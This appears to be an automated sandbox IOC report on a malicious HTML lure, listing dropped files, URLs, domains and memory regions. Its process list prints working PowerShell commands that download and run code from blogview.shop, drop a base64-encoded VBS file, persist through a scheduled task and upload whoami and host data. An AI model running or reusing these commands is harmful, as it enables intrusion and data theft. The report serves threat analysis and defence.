IOC Report
g3Wg5cdIcT.html

loading gif

Files

File Path
Type
Category
Malicious
g3Wg5cdIcT.html
HTML document, ASCII text, with very long lines (2215)
initial sample
malicious
C:\Users\Public\Libraries\Libraries.vbs
ASCII text, with very long lines (836), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\jq2oycxc.wmp\748-929-24.html.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Tue Oct 8 16:06:29 2024, mtime=Tue Oct 8 16:06:29 2024, atime=Tue Oct 8 16:06:29 2024, length=0, window=hide
dropped
malicious
C:\Users\user\Downloads\748-929-24.zip (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
malicious
C:\Users\user\Downloads\c4304711-3ea8-4580-ab60-ae16aaf251fc.tmp
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zg3c05e.2tr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15bodsd4.nq2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xhss2ks.emt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cbhr0pw.qe1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj02asfh.g5a.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgzycyvt.o3g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw0hrqt0.s5j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2beratc.0am.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4lx35yt.4zg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmqeati5.3vy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\unarchiver.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7819850dd61b8837.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W3QD8SYL8HN7KD3WNSSD.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\Downloads\748-929-24.zip.crdownload (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
Chrome Cache Entry: 118
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 119
Unicode text, UTF-8 text, with very long lines (65468)
downloaded
Chrome Cache Entry: 120
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 121
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 122
Web Open Font Format (Version 2), TrueType, length 24228, version 3.1245
downloaded
Chrome Cache Entry: 123
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 124
ASCII text, with very long lines (65536), with no line terminators
downloaded
Chrome Cache Entry: 125
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 126
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 127
Unicode text, UTF-8 text, with very long lines (65468)
dropped
Chrome Cache Entry: 128
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 129
Web Open Font Format (Version 2), TrueType, length 23040, version 3.1245
downloaded
Chrome Cache Entry: 130
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 131
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 132
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 133
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 134
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 135
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 136
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 137
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 138
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 139
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 140
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 141
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 142
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 143
Web Open Font Format (Version 2), TrueType, length 24288, version 3.1245
downloaded
Chrome Cache Entry: 144
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 145
Web Open Font Format (Version 2), TrueType, length 6428, version 3.1245
downloaded
Chrome Cache Entry: 146
ASCII text, with very long lines (53473)
dropped
Chrome Cache Entry: 147
WebAssembly (wasm) binary module version 0x1 (MVP)
downloaded
Chrome Cache Entry: 148
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 149
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 150
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
Chrome Cache Entry: 151
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 152
Web Open Font Format (Version 2), TrueType, length 6572, version 3.1245
downloaded
Chrome Cache Entry: 153
ASCII text, with very long lines (53473)
downloaded
Chrome Cache Entry: 154
HTML document, Unicode text, UTF-8 text, with very long lines (5923), with no line terminators
downloaded
Chrome Cache Entry: 155
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 156
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 157
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 158
Web Open Font Format (Version 2), TrueType, length 6532, version 3.1245
downloaded
Chrome Cache Entry: 159
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 160
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 161
WebAssembly (wasm) binary module version 0x1 (MVP)
dropped
Chrome Cache Entry: 162
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
downloaded
Chrome Cache Entry: 163
Web Open Font Format (Version 2), TrueType, length 6172, version 3.1245
downloaded
There are 63 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\g3Wg5cdIcT.html"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1980,i,9620083289215155752,12996393152971919094,262144 /prefetch:8
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jq2oycxc.wmp\748-929-24.html.lnk"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell.exe -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://blogview.shop/api/values/view/748-929-24.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\748-929-24.html', $dd);&$home\appdata\local\temp\748-929-24.html;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9ibG9ndmlldy5zaG9wL2FwaS92YWx1ZXMvMzgzMDM1MjkxNDM0MzgxOTkxNzEvcmVmcmVzaDE5OS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vYmxvZ3ZpZXcuc2hvcC9hcGkvdmFsdWVzL3JlZnJlc2gxOTknLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c =new-object system.net.webclient
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\appdata\local\temp\748-929-24.html
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2000,i,12076860377407532846,4455740521908346531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://blogview.shop/api/values/38303529143438199171/refresh199/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://blogview.shop/api/values/refresh199',$drpy);}
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://blogview.shop/api/values/38303529143438199171/refresh199/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://blogview.shop/api/values/refresh199',$drpy);}
malicious
C:\Windows\SysWOW64\unarchiver.exe
"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\748-929-24.zip"
C:\Windows\SysWOW64\7za.exe
"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jq2oycxc.wmp" "C:\Users\user\Downloads\748-929-24.zip"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://blogview.shop/api/values/
unknown
malicious
https://blogview.shop/api/values/38303529143438199171/refresh199/
unknown
malicious
https://blogview.shop/api/values/vi
unknown
malicious
https://blogview.shop/api/values/view/748-929-24.txt
unknown
malicious
https://blogview.sh
unknown
malicious
https://blogview.shop/api/values/refresh199
unknown
malicious
https://blogview.shop
unknown
malicious
https://go.microsoft.co0
unknown
https://accounts.ukr.net/login/assets/illustration-design-ece6269f.svg
212.42.75.253
https://edisk.ukr.net
unknown
http://www.microsoft.coR
unknown
https://contoso.com/License
unknown
https://accounts.ukr.net/login/js/pow-worker-wasm.js?ab3ac7fc
212.42.75.253
https://poll0.fwdcdn.com/tunnel/websocket?cv%2Faccounts=login%2F2024.10.14.0820
212.42.75.248
https://accounts.ukr.net/api/v1/cai/browser/get
212.42.75.253
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
https://accounts.ukr.net/login/assets/illustration-support-a8ca1214.svg
212.42.75.253
http://go.micros
unknown
https://accounts.ukr.net/login/assets/illustration-speedy-5282c395.svg
212.42.75.253
https://accounts.ukr.net/login/assets/illustration-unlimited-8c72d422.svg
212.42.75.253
https://accounts.ukr.net/login/assets/assembly-vn6BflkY.wasm
212.42.75.253
https://accounts.ukr.net/login/assets/inter-regular-latin-4X1OBjWa.woff2
212.42.75.253
file:///C:/Users/user/appdata/local/temp/748-929-24.html
https://www.ukr.net/terms/
unknown
https://aka.ms/pscore6lB
unknown
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb&action=login_client
212.42.75.253
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://accounts.ukr.net/login/assets/illustration-backup-e81719b8.svg
212.42.75.253
https://accounts.ukr.net/login/assets/inter-semi-bold-cyrillic-TYsCInMJ.woff2
212.42.75.253
https://accounts.ukr.net/login/css/bundle.css?3eae8d99
212.42.75.253
https://blogview.shop/api/values/38303529143438199171/refresh199/5816370.txt
unknown
https://play.google.com/store/apps/details?id=net.ukr.mail
unknown
https://accounts.ukr.net/login/assets/illustration-dark-mode-2281edaa.svg
212.42.75.253
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://accounts.ukr.net/login/assets/file-20d110f0.svg
212.42.75.253
https://mail.ukr.net/terms_$
unknown
https://accounts.ukr.net/login/assets/illustration-patriotic-59471166.svg
212.42.75.253
https://accounts.ukr.net/api/v1/token/verification/acquire
212.42.75.253
https://accounts.ukr.net/login/assets/inter-bold-cyrillic-cOEmsfFa.woff2
212.42.75.253
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://accounts.ukr.net/login/assets/illustration-big-files-db9d7440.svg
212.42.75.253
https://accounts.ukr.net/login/assets/google-play-badge-8c42ddbd.svg
212.42.75.253
https://accounts.ukr.net/login/favicon.ico
212.42.75.253
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://accounts.ukr.net/api/v1/token/analytics/acquire
212.42.75.253
https://go.micro
unknown
https://accounts.ukr.net/login/assets/app-store-badge-83fca98c.svg
212.42.75.253
https://accounts.ukr.net/login/assets/illustration-2fa-02329941.svg
212.42.75.253
https://accounts.ukr.net/login/assets/illustration-markers-828d12d7.svg
212.42.75.253
https://accounts.ukr.net/login/assets/illustration-popular-bfc8c819.svg
212.42.75.253
https://contoso.com/Icon
unknown
https://accounts.ukr.net/login/js/bundle.js?949e9a20
212.42.75.253
https://github.com/Pester/Pester
unknown
https://accounts.ukr.net/login/assets/inter-bold-latin-4bgN5WJ1.woff2
212.42.75.253
https://www.ukr.net$
unknown
https://accounts.ukr.net/login/assets/inter-regular-cyrillic-gDZy7y86.woff2
212.42.75.253
http://crl.micro
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://mail.ukr.net/terms_uk.html
unknown
https://accounts.ukr.net/login/assets/inter-medium-cyrillic-rEpTbtr3.woff2
212.42.75.253
https://aka.ms/pscore68
unknown
https://edisk.ukr.net/
212.42.78.17
https://accounts.ukr.net/login/assets/inter-medium-latin-beJWZ28Q.woff2
212.42.75.253
There are 57 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
blogview.shop
unknown
malicious
edisk.ukr.net
212.42.78.17
accounts.ukr.net
212.42.75.253
poll0.fwdcdn.com
212.42.75.248
www.google.com
172.217.16.132

IPs

IP
Domain
Country
Malicious
212.42.75.253
accounts.ukr.net
Ukraine
192.168.2.8
unknown
unknown
192.168.2.7
unknown
unknown
212.42.75.248
poll0.fwdcdn.com
Ukraine
212.42.78.17
edisk.ukr.net
Ukraine
192.168.2.5
unknown
unknown
239.255.255.250
unknown
Reserved
172.217.16.132
www.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
19DE464C000
heap
page read and write
malicious
289B4631000
trusted library allocation
page read and write
malicious
255DA205000
heap
page read and write
malicious
289CCD70000
heap
page read and write
malicious
19DE45FF000
heap
page read and write
malicious
19DE47B5000
heap
page read and write
malicious
289B2880000
heap
page read and write
malicious
19DE4606000
heap
page read and write
malicious
255DA190000
heap
page read and write
malicious
289B5CFD000
trusted library allocation
page read and write
malicious
255DA1C6000
heap
page read and write
malicious
233ADBE0000
heap
page read and write
malicious
255DA145000
heap
page read and write
malicious
4987000
trusted library allocation
page read and write
malicious
4ECF000
trusted library allocation
page read and write
malicious
4E8F000
stack
page read and write
8720000
trusted library allocation
page execute and read and write
3497000
heap
page read and write
72A0000
trusted library allocation
page read and write
8985000
heap
page read and write
19DE60C0000
heap
page read and write
289B42E3000
trusted library allocation
page read and write
4C59000
trusted library allocation
page read and write
233BF5B1000
trusted library allocation
page read and write
19DE463C000
heap
page read and write
7FF838980000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
2A9E000
unkown
page read and write
C80000
heap
page read and write
233C7B95000
heap
page read and write
7FF8388D0000
trusted library allocation
page read and write
E70000
heap
page read and write
52FF000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
7C90000
trusted library allocation
page read and write
7FF838900000
trusted library allocation
page execute and read and write
756E000
stack
page read and write
785E000
stack
page read and write
233ADCE0000
heap
page read and write
4C72000
trusted library allocation
page read and write
289CCD60000
heap
page read and write
789E000
stack
page read and write
39D000
stack
page read and write
88E0000
trusted library allocation
page execute and read and write
7350000
trusted library allocation
page read and write
508E000
stack
page read and write
7FF838940000
trusted library allocation
page read and write
7FF8388E9000
trusted library allocation
page read and write
6C20000
heap
page read and write
233BF5A7000
trusted library allocation
page read and write
DF7000
trusted library allocation
page execute and read and write
2B70000
heap
page read and write
2953000
heap
page read and write
2C00000
heap
page read and write
72DE000
stack
page read and write
46A0000
trusted library allocation
page read and write
6F79000
heap
page read and write
289B43C5000
heap
page read and write
233ADD60000
trusted library allocation
page read and write
30C7000
stack
page read and write
7FF8388D0000
trusted library allocation
page read and write
CAC000
trusted library allocation
page execute and read and write
7FF838950000
trusted library allocation
page read and write
233ADB90000
heap
page read and write
8850000
trusted library allocation
page read and write
7B5A000
trusted library allocation
page read and write
55B9000
trusted library allocation
page read and write
289B42E0000
trusted library allocation
page read and write
6FA5CFF000
stack
page read and write
88F0000
trusted library allocation
page read and write
289B5C2B000
trusted library allocation
page read and write
7FF8389A0000
trusted library allocation
page read and write
7FF838A70000
trusted library allocation
page read and write
4DBF000
stack
page read and write
87E0000
heap
page read and write
6FA52FA000
stack
page read and write
4EFC000
stack
page read and write
233AF590000
heap
page execute and read and write
289B2B0E000
heap
page read and write
573D000
trusted library allocation
page read and write
7FF838743000
trusted library allocation
page read and write
DE2000
trusted library allocation
page execute and read and write
CA2000
trusted library allocation
page execute and read and write
289C4631000
trusted library allocation
page read and write
E3717FE000
stack
page read and write
897B000
heap
page read and write
7FF8388E5000
trusted library allocation
page read and write
28FE000
heap
page read and write
6FA54FE000
stack
page read and write
E96000
heap
page read and write
2D9C000
trusted library allocation
page read and write
289B5C23000
trusted library allocation
page read and write
6EC0000
heap
page execute and read and write
2D50000
trusted library allocation
page read and write
752A000
stack
page read and write
116F000
stack
page read and write
7FF838A50000
trusted library allocation
page read and write
2D4D000
trusted library allocation
page read and write
6FA5DFE000
stack
page read and write
324D000
heap
page read and write
2D4B000
trusted library allocation
page read and write
3430000
heap
page read and write
770000
heap
page read and write
7FF838970000
trusted library allocation
page read and write
670000
heap
page read and write
2A50000
heap
page read and write
289B629C000
trusted library allocation
page read and write
255DA1FD000
heap
page read and write
31CF000
unkown
page read and write
E3713D3000
stack
page read and write
E371A7E000
stack
page read and write
DBF000
stack
page read and write
270E000
stack
page read and write
6B8F000
stack
page read and write
73ED000
stack
page read and write
78B2000
heap
page read and write
E78000
heap
page read and write
46D5000
trusted library allocation
page execute and read and write
233ADC6C000
heap
page read and write
7FF8389B0000
trusted library allocation
page read and write
233AF5A1000
trusted library allocation
page read and write
46AD000
trusted library allocation
page execute and read and write
233ADC0F000
heap
page read and write
6FA57FF000
stack
page read and write
7C80000
trusted library allocation
page read and write
D93FCFA000
stack
page read and write
4FC000
stack
page read and write
289B4620000
heap
page execute and read and write
6DE000
stack
page read and write
CA0000
trusted library allocation
page read and write
19DE4590000
heap
page read and write
2BF6000
heap
page read and write
233ADD80000
heap
page read and write
289CCAE0000
heap
page read and write
560000
heap
page read and write
255DA232000
heap
page read and write
4D40000
heap
page read and write
289B2810000
heap
page read and write
7FF838732000
trusted library allocation
page read and write
6FA5AFE000
stack
page read and write
289B459B000
heap
page read and write
6ACD000
stack
page read and write
7C70000
trusted library allocation
page execute and read and write
7FF838734000
trusted library allocation
page read and write
46B9000
trusted library allocation
page read and write
680000
heap
page read and write
7130000
trusted library allocation
page read and write
6BDE000
stack
page read and write
106F000
stack
page read and write
289B44F0000
heap
page read and write
7D0000
heap
page read and write
7D00000
trusted library allocation
page read and write
495E000
stack
page read and write
7CC0000
trusted library allocation
page read and write
11B0000
heap
page execute and read and write
69AD000
stack
page read and write
5831000
trusted library allocation
page read and write
7FF8389C0000
trusted library allocation
page read and write
5A2C000
trusted library allocation
page read and write
7C2E000
stack
page read and write
6F71000
heap
page read and write
7FF83873D000
trusted library allocation
page execute and read and write
7FF838732000
trusted library allocation
page read and write
3CF1000
trusted library allocation
page read and write
6C40000
heap
page read and write
233ADB70000
heap
page read and write
650000
heap
page read and write
67E000
unkown
page read and write
E371E3E000
stack
page read and write
C4E000
stack
page read and write
7290000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
7A48000
heap
page read and write
6ED0000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
29E5000
heap
page read and write
7E8C000
stack
page read and write
6FE8000
trusted library allocation
page read and write
4DFB000
stack
page read and write
3490000
heap
page read and write
7A4E000
heap
page read and write
480C000
stack
page read and write
289CCDBB000
heap
page read and write
7AFD000
trusted library allocation
page read and write
31E0000
heap
page read and write
C0E000
stack
page read and write
680000
heap
page read and write
7F52000
heap
page read and write
518D000
stack
page read and write
CB0000
heap
page read and write
BBF000
stack
page read and write
2D53000
trusted library allocation
page read and write
4710000
trusted library allocation
page execute and read and write
233AF629000
trusted library allocation
page read and write
47B8000
trusted library allocation
page read and write
255DA160000
heap
page read and write
2969000
heap
page read and write
491E000
stack
page read and write
7FF838A30000
trusted library allocation
page read and write
7A63000
heap
page read and write
7CE0000
trusted library allocation
page read and write
31E8000
heap
page read and write
7A96000
heap
page read and write
231B000
stack
page read and write
7A29000
heap
page read and write
